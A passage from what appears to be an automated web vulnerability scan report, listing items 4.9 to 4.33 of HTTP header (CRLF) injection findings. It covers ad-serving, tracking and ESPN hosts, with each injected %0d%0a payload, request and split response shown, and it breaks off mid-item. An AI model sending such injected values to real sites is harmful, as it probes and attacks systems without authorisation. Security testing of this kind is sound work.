The value of REST URL parameter 1 is copied into the Location response header. The payload 31515%0d%0a8ed6132a227 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31515%0d%0a8ed6132a227/N3220.ESPN/B4924969.62 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/31515
8ed6132a227
/N3220.ESPN/B4924969.62:
Date: Sat, 06 Nov 2010 14:32:29 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.9. http://ad.vulnerable.ad.partner/ad/N3220.ESPN/B4924969.63 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N3220.ESPN/B4924969.63

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5b28f%0d%0a6491db27e37 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5b28f%0d%0a6491db27e37/N3220.ESPN/B4924969.63 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5b28f
6491db27e37
/N3220.ESPN/B4924969.63:
Date: Sat, 06 Nov 2010 14:32:32 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.10. http://ad.vulnerable.ad.partner/ad/N3340.espn.com/B4282150.59 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N3340.espn.com/B4282150.59

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3fe38%0d%0abb158bf3b84 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3fe38%0d%0abb158bf3b84/N3340.espn.com/B4282150.59 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3fe38
bb158bf3b84
/N3340.espn.com/B4282150.59:
Date: Sat, 06 Nov 2010 22:53:22 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.11. http://ad.vulnerable.ad.partner/ad/N4694.Beep01/B4850508.10 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N4694.Beep01/B4850508.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 967b4%0d%0a392f439ce08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /967b4%0d%0a392f439ce08/N4694.Beep01/B4850508.10 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/967b4
392f439ce08
/N4694.Beep01/B4850508.10:
Date: Sun, 07 Nov 2010 05:41:58 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.12. http://ad.vulnerable.ad.partner/ad/N5364.vibrantmedia.com/B4832252.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N5364.vibrantmedia.com/B4832252.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 97c1a%0d%0a2c6a623140a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /97c1a%0d%0a2c6a623140a/N5364.vibrantmedia.com/B4832252.3 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/97c1a
2c6a623140a
/N5364.vibrantmedia.com/B4832252.3:
Date: Sun, 07 Nov 2010 01:11:17 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.13. http://ad.vulnerable.ad.partner/ad/N5865.149077.ESPN/B4748231.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/N5865.149077.ESPN/B4748231.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4cf53%0d%0a74d41d2d621 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4cf53%0d%0a74d41d2d621/N5865.149077.ESPN/B4748231.11 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4cf53
74d41d2d621
/N5865.149077.ESPN/B4748231.11:
Date: Sat, 06 Nov 2010 14:32:37 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.14. http://ad.vulnerable.ad.partner/ad/allb.tbd/front [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/allb.tbd/front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2ddc5%0d%0ac36c8930ac9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2ddc5%0d%0ac36c8930ac9/allb.tbd/front HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2ddc5
c36c8930ac9
/allb.tbd/front:
Date: Sun, 07 Nov 2010 05:41:57 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.15. http://ad.vulnerable.ad.partner/ad/x1.cont/espn/360/soccer [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /ad/x1.cont/espn/360/soccer

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1075c%0d%0a9979249b2bf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1075c%0d%0a9979249b2bf/x1.cont/espn/360/soccer HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1075c
9979249b2bf
/x1.cont/espn/360/soccer:
Date: Sat, 06 Nov 2010 14:32:47 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.16. http://ad.vulnerable.ad.partner/adi/N2724.ESPNBass/B4661944.101 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N2724.ESPNBass/B4661944.101

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62102%0d%0a9426b771d28 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62102%0d%0a9426b771d28/N2724.ESPNBass/B4661944.101 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62102
9426b771d28
/N2724.ESPNBass/B4661944.101:
Date: Sat, 06 Nov 2010 14:32:57 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.17. http://ad.vulnerable.ad.partner/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 85850%0d%0ab7d666d43dc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /85850%0d%0ab7d666d43dc/N3175.153731.YAHOOINC.NETWORK-PR/B4640114 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/85850
b7d666d43dc
/N3175.153731.YAHOOINC.NETWORK-PR/B4640114:
Date: Sun, 07 Nov 2010 01:11:19 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.18. http://ad.vulnerable.ad.partner/adi/N3220.ESPN/B4924969.15 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N3220.ESPN/B4924969.15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 65135%0d%0a6b830c274ea was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /65135%0d%0a6b830c274ea/N3220.ESPN/B4924969.15 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/65135
6b830c274ea
/N3220.ESPN/B4924969.15:
Date: Sat, 06 Nov 2010 14:32:59 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.19. http://ad.vulnerable.ad.partner/adi/N3740.132309.BURSTMEDIA/B4366794.6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N3740.132309.BURSTMEDIA/B4366794.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7c00e%0d%0a97c2f2680ae was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7c00e%0d%0a97c2f2680ae/N3740.132309.BURSTMEDIA/B4366794.6 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7c00e
97c2f2680ae
/N3740.132309.BURSTMEDIA/B4366794.6:
Date: Sun, 07 Nov 2010 01:11:19 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.20. http://ad.vulnerable.ad.partner/adi/N4492.espn.com/B4156424 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N4492.espn.com/B4156424

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5b47c%0d%0a3682d44bafc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5b47c%0d%0a3682d44bafc/N4492.espn.com/B4156424 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5b47c
3682d44bafc
/N4492.espn.com/B4156424:
Date: Sat, 06 Nov 2010 14:32:58 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.21. http://ad.vulnerable.ad.partner/adi/N6357.2489.ESPN.COM/B4629693.10 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N6357.2489.ESPN.COM/B4629693.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5ddf2%0d%0a4e2fc26ae1d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5ddf2%0d%0a4e2fc26ae1d/N6357.2489.ESPN.COM/B4629693.10 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5ddf2
4e2fc26ae1d
/N6357.2489.ESPN.COM/B4629693.10:
Date: Sat, 06 Nov 2010 14:33:05 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.22. http://ad.vulnerable.ad.partner/adi/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5dab8%0d%0a02e8772af9d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5dab8%0d%0a02e8772af9d/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5dab8
02e8772af9d
/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38:
Date: Sun, 07 Nov 2010 05:41:59 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.23. http://ad.vulnerable.ad.partner/adj/N3220.ESPN/B4924969.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3220.ESPN/B4924969.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 87709%0d%0a5cc45810845 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /87709%0d%0a5cc45810845/N3220.ESPN/B4924969.11 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/87709
5cc45810845
/N3220.ESPN/B4924969.11:
Date: Sat, 06 Nov 2010 14:33:24 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.24. http://ad.vulnerable.ad.partner/adj/N3340.espn.com/B4282150.59 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3340.espn.com/B4282150.59

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 232ab%0d%0a4ec2aaa41d5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /232ab%0d%0a4ec2aaa41d5/N3340.espn.com/B4282150.59 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/232ab
4ec2aaa41d5
/N3340.espn.com/B4282150.59:
Date: Sat, 06 Nov 2010 22:53:22 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.25. http://ad.vulnerable.ad.partner/adj/N3740.132309.BURSTMEDIA/B4366794.6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3740.132309.BURSTMEDIA/B4366794.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 665ec%0d%0a0ac58374054 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /665ec%0d%0a0ac58374054/N3740.132309.BURSTMEDIA/B4366794.6 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/665ec
0ac58374054
/N3740.132309.BURSTMEDIA/B4366794.6:
Date: Sun, 07 Nov 2010 01:11:21 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.26. http://ad.vulnerable.ad.partner/adj/N6357.2489.ESPN.COM/B4629693.10 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N6357.2489.ESPN.COM/B4629693.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 89fec%0d%0a9060095bbb7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /89fec%0d%0a9060095bbb7/N6357.2489.ESPN.COM/B4629693.10 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/89fec
9060095bbb7
/N6357.2489.ESPN.COM/B4629693.10:
Date: Sat, 06 Nov 2010 14:33:27 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.27. http://ad.vulnerable.ad.partner/adj/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 58ca0%0d%0addbc95694e6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /58ca0%0d%0addbc95694e6/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/58ca0
ddbc95694e6
/N763.134426.GOOGLEDISPLAYNETWORK/B4893505.38:
Date: Sun, 07 Nov 2010 05:42:24 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.28. http://ad.vulnerable.ad.partner/adj/x1.cont/espn/360/soccer [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/x1.cont/espn/360/soccer

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5e317%0d%0a64a4f1f5193 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5e317%0d%0a64a4f1f5193/x1.cont/espn/360/soccer HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=OPT_OUT;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5e317
64a4f1f5193
/x1.cont/espn/360/soccer:
Date: Sat, 06 Nov 2010 14:33:35 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.29. http://ad.vulnerable.ad.partner/jump/N4694.Beep01/B4850508.10 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /jump/N4694.Beep01/B4850508.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22147%0d%0ae99d359900 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22147%0d%0ae99d359900/N4694.Beep01/B4850508.10 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/22147
e99d359900
/N4694.Beep01/B4850508.10:
Date: Sun, 07 Nov 2010 05:42:55 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.30. http://ad.vulnerable.ad.partner/jump/allb.tbd/front [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /jump/allb.tbd/front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 85a71%0d%0a7d2d0e52669 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /85a71%0d%0a7d2d0e52669/allb.tbd/front HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUKP300ad=L0/Q53624_9650_5_110510_1_123110_338790x320289x110510x1x1; id=cb86c212e00001a||t=1288931628|et=730|cs=liqctv_d;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/85a71
7d2d0e52669
/allb.tbd/front:
Date: Sun, 07 Nov 2010 05:42:27 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

4.31. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://au.track.decideinteractive.com
Path:   /n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload 9844e%0d%0a6d1fad43f6c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/13465/13553/9844e%0d%0a6d1fad43f6c/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c HTTP/1.1
Host: au.track.decideinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 07 Nov 2010 05:43:11 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Sun, 07 Nov 2010 05:43:11 GMT
location: http://9844e
6d1fad43f6c

Set-Cookie: id=9290926875511620345; expires=Mon, 07-Nov-2011 05:43:11 GMT; path=/; domain=.decideinteractive.com;
Set-Cookie: name=9290926875511620544; path=/; domain=.decideinteractive.com;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


4.32. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 65a62%0d%0a852639705e9 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=f035c81a-6288-41b1-bdc2-bfc1ef3a57163F7010; A2=dOCf9Kih035P0000820wrG; eyeblaster=BWVal=&BWDate=&debuglevel=65a62%0d%0a852639705e9; B2=6Niz0820wrG; u2=f035c81a-6288-41b1-bdc2-bfc1ef3a57163F7010; E2=035P820wrG; C3=0s9X820wrG0000002_; u3=1; D3=0s9X002H820wrG; C_8557=3615119;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-Powered-By: ASP.NET
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=65a62
852639705e9
; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=f035c81a-6288-41b1-bdc2-bfc1ef3a57163F701g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=f035c81a-6288-41b1-bdc2-bfc1ef3a57163F701g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
Connection: close


4.33. http://games.espn.go.com/pokerpickem/en/frontpage [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.espn.go.com
Path:   /pokerpickem/en/frontpage

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload f3394%0d%0a260e20407d2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pokerpickem/f3394%0d%0a260e20407d2/frontpage HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
